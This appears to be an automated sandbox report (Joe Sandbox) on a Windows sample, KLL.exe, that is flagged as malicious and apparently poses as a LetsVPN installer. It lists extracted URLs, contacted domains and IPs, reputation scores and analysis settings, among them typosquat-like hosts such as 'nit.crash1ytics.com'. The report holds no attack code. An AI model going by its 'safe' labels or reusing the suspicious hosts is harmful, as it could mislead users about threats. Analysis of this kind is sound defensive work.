https://in.appcenter.ms/logs?api-version=1.0.0	0%	Avira URL Cloud	safe
https://widget.intercom.io/widget/	0%	Avira URL Cloud	safe
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windo	0%	Avira URL Cloud	safe
https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid	0%	Virustotal		Browse
https://in.appcenter.ms/logs?api-version=1.0.0	0%	Virustotal		Browse
http://www.isimba.cn0	0%	Avira URL Cloud	safe
https://WSARecv0.0.0.0%2F0Author	0%	Avira URL Cloud	safe
https://rdrt.jkjtdfbs.com/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-	0%	Avira URL Cloud	safe
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windo	0%	Virustotal		Browse
https://d1dmgcawtbm6l9.cloudfront.net/rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1	0%	Avira URL Cloud	safe
http://ws-ap1.pusher.com/app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2	0%	Avira URL Cloud	safe
https://nit.crash1ytics.comb420e29fdb1b6d67b3b951525211a4d6https://nit.crash1ytics.com	0%	Avira URL Cloud	safe
https://widget.intercom.io/widget/	0%	Virustotal		Browse
http://ws-ap1.pusher.com/app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2	0%	Virustotal		Browse
https://rdrt.jkjtdfbs.com/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-	0%	Virustotal		Browse
https://intercom.help/letsvpn-world/en/collections/Killer	0%	Avira URL Cloud	safe
http://schemas.fontawesome.io/icons/	0%	Avira URL Cloud	safe
https://0.0.0.0%2F0l	0%	Avira URL Cloud	safe
https://in.appcenter.ms./logs?api-version=1.0.0	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/en/collections/Killer	0%	Virustotal		Browse
https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6	0%	Avira URL Cloud	safe
https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588	0%	Avira URL Cloud	safe
http://wpfanimatedgif.codeplex.com	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9	0%	Avira URL Cloud	safe
http://schemas.fontawesome.io/icons/	0%	Virustotal		Browse
https://d1dmgcawtbm6l9.cloudfront.net/rest-apiedns_client_subnet=0.0.0.0%2F0&name=d1dmgcawtbm6l9.clo	0%	Avira URL Cloud	safe
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/3401886-special-settings-for-smartby	0%	Avira URL Cloud	safe
https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958	0%	Avira URL Cloud	safe
https://nit.crash1ytics.com	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/en/articles/2926044-what-if-i-reached-maximum-connection-limit	0%	Avira URL Cloud	safe
https://github.com/CommunityToolkit/dotnet	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV21C:	0%	Avira URL Cloud	safe
https://d1dmgcawtbm6l9.cloudfront.net/rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1	0%	Avira URL Cloud	safe
https://d1dmgcawtbm6l9.cloudfront.net/rest-api	0%	Avira URL Cloud	safe
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8262801-special-settings-for-killer-	0%	Avira URL Cloud	safe
http://crl.certum.pl/cscasha2.crl0q	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://cscasha2.ocsp-certum.com04	0%	Avira URL Cloud	safe
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8262720-special-settings-for-host-ne	0%	Avira URL Cloud	safe
http://crl.micro?r	0%	Avira URL Cloud	safe
https://nit.crash1ytics.com/app32/devicehttps://nit.crash1ytics.com/app32/device	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/Prod1C:	0%	Avira URL Cloud	safe
http://ocsp.sec	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nal.fqoqehwib.com	99.34.124.121	true	false	0%, Virustotal, Browse	unknown
www.wshifen.com	103.235.47.188	true	false	0%, Virustotal, Browse	unknown
d1dmgcawtbm6l9.cloudfront.net	108.138.187.72	true	false	0%, Virustotal, Browse	unknown
socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com	54.251.31.103	true	false	0%, Virustotal, Browse	unknown
www.google.com	142.250.186.132	true	false	0%, Virustotal, Browse	unknown
nit.crash1ytics.com	223.61.70.52	true	false	0%, Virustotal, Browse	unknown
yandex.com	77.88.55.88	true	false	0%, Virustotal, Browse	unknown
chr.alipayassets.com	85.222.79.57	true	false	0%, Virustotal, Browse	unknown
in.appcenter.ms	unknown	unknown	true	0%, Virustotal, Browse	unknown
ws-ap1.pusher.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.yandex.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.baidu.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://d1dmgcawtbm6l9.cloudfront.net/rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1	false	Avira URL Cloud: safe	unknown
https://d1dmgcawtbm6l9.cloudfront.net/rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1	false	Avira URL Cloud: safe	unknown
http://ws-ap1.pusher.com/app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://d1dmgcawtbm6l9.cloudfront.net/rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pngimg.com/uploads/light/light_PNG14440.png	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8	LetsPRO.exe, 0000003C.00000002.4064077398.0000000006956000.00000002.00000001.01000000.00000023.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/toolkit/dotnet	LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/collections/1628560-help-documents	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.0000000003521000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://repository.certum.pl/cscasha2.cer0	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://0.0.0.0%2F0	LetsPRO.exe, 0000003C.00000002.4070374175.000000000FE80000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://letsvpn.world/terms.html	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 0000001E.00000002.2563842250.0000000002666000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://postPost142.242.204.31	LetsPRO.exe, 0000003C.00000002.4071745471.000000001003A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000002.2325355808.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2318433786.00000208768E1000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://intercom.help/letsvpn-world/-N	letsvpn-latest.exe, 00000015.00000002.2675464551.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://letsvpn.world/registerterm.html	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://letsvpn.world/privacy.html	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://repository.certum.pl/ctnca.cer0	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.hardcodet.net/taskbar	LetsPRO.exe, 0000003C.00000002.4097109567.0000000035C42000.00000002.00000001.01000000.00000033.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid	LetsPRO.exe, 0000003C.00000002.4151476576.0000000068E49000.00000002.00000001.01000000.00000025.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://in.appcenter.ms/logs?api-version=1.0.0	LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000017.00000002.2334908469.00000000051B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2334908469.00000000051A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2565154970.00000000045A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://widget.intercom.io/widget/	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windo	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.isimba.cn0	KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://WSARecv0.0.0.0%2F0Author	LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdrt.jkjtdfbs.com/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000001E.00000002.2571050198.000000000560D000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nit.crash1ytics.comb420e29fdb1b6d67b3b951525211a4d6https://nit.crash1ytics.com	LetsPRO.exe, 0000003C.00000002.4067756998.000000000FCBE000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/collections/Killer	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.fontawesome.io/icons/	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.0000000003521000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://0.0.0.0%2F0l	LetsPRO.exe, 0000003C.00000002.4070374175.000000000FE80000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://in.appcenter.ms./logs?api-version=1.0.0	LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp	false	Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588	LetsPRO.exe, 0000003C.00000002.4064210674.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000017.00000002.2334908469.000000000517C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2565154970.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.0000000003521000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wpfanimatedgif.codeplex.com	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certum.pl/CPS0	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001E.00000002.2571050198.000000000560D000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://d1dmgcawtbm6l9.cloudfront.net/rest-apiedns_client_subnet=0.0.0.0%2F0&name=d1dmgcawtbm6l9.clo	LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/3401886-special-settings-for-smartby	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958	LetsPRO.exe, 0000003C.00000002.4064210674.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://repository.certum.pl/ctnca.cer09	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://nit.crash1ytics.com	LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	LetsPRO.exe, 0000003C.00000002.4042371730.00000000037FB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001E.00000002.2565154970.00000000046F6000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.certum.pl/ctnca.crl0k	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	LetsPRO.exe, 0000003C.00000002.4042371730.00000000037FB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://intercom.help/letsvpn-world/en/articles/2926044-what-if-i-reached-maximum-connection-limit	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/CommunityToolkit/dotnet	LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 0000000D.00000003.2263667963.0000018F99400000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d1dmgcawtbm6l9.cloudfront.net/rest-api	LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	letsvpn-latest.exe, 00000015.00000000.2315917181.000000000040A000.00000008.00000001.01000000.0000000E.sdmp, letsvpn-latest.exe, 00000015.00000003.2637768217.0000000000844000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000002.2674885073.000000000040A000.00000004.00000001.01000000.0000000E.sdmp	false	URL Reputation: safe	unknown
https://www.certum.pl/CPS0	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://www.symauth.com/cps0(	KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8262801-special-settings-for-killer-	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/cscasha2.crl0q	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	LetsPRO.exe, 0000003C.00000002.4042371730.00000000037FB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cscasha2.ocsp-certum.com04	KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8262720-special-settings-for-host-ne	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro?r	powershell.exe, 00000017.00000002.2326792493.00000000030F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nit.crash1ytics.com/app32/devicehttps://nit.crash1ytics.com/app32/device	LetsPRO.exe, 0000003C.00000002.4066763632.000000000FC86000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod1C:	svchost.exe, 0000000D.00000003.2263667963.0000018F9945E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sec	LetsPRO.exe, 0000003C.00000002.4041405229.0000000001B87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/articles/3710603-about-logging-in-out-anomalies	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 0000001E.00000002.2564049332.00000000026E9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.symauth.com/rpa00	KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://in.appcenter.ms	LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp	false	Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/articles/2925752-how-to-download-letsvpn	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
https://nit.crash1ytics.com/app32/device	LetsPRO.exe, 0000003C.00000002.4068679879.000000000FD56000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001E.00000002.2565154970.00000000046F6000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://postPost67.137.174.254	LetsPRO.exe, 0000003C.00000002.4069200918.000000000FD9E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown
https://USUS2.CERTIFICATE	LetsPRO.exe, 0000003C.00000002.4070374175.000000000FE80000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4071745471.000000001003A000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4069200918.000000000FD9E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://intercom.help/letsvpn-world/en/articles/2926062-recover-my-letsvpn-account	LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
183.60.146.66	unknown	China	134763	CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCN	false
35.227.223.56	unknown	United States	15169	GOOGLEUS	false
154.204.0.5	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
103.235.47.188	www.wshifen.com	Hong Kong	55967	BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	false
54.251.31.103	socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
23.98.101.155	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
108.138.187.72	d1dmgcawtbm6l9.cloudfront.net	United States	16509	AMAZON-02US	false
77.88.55.88	yandex.com	Russian Federation	13238	YANDEXRU	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1477236
Start date and time:	2024-07-20 16:28:46 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	75
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KLL.exe
Detection:	MAL
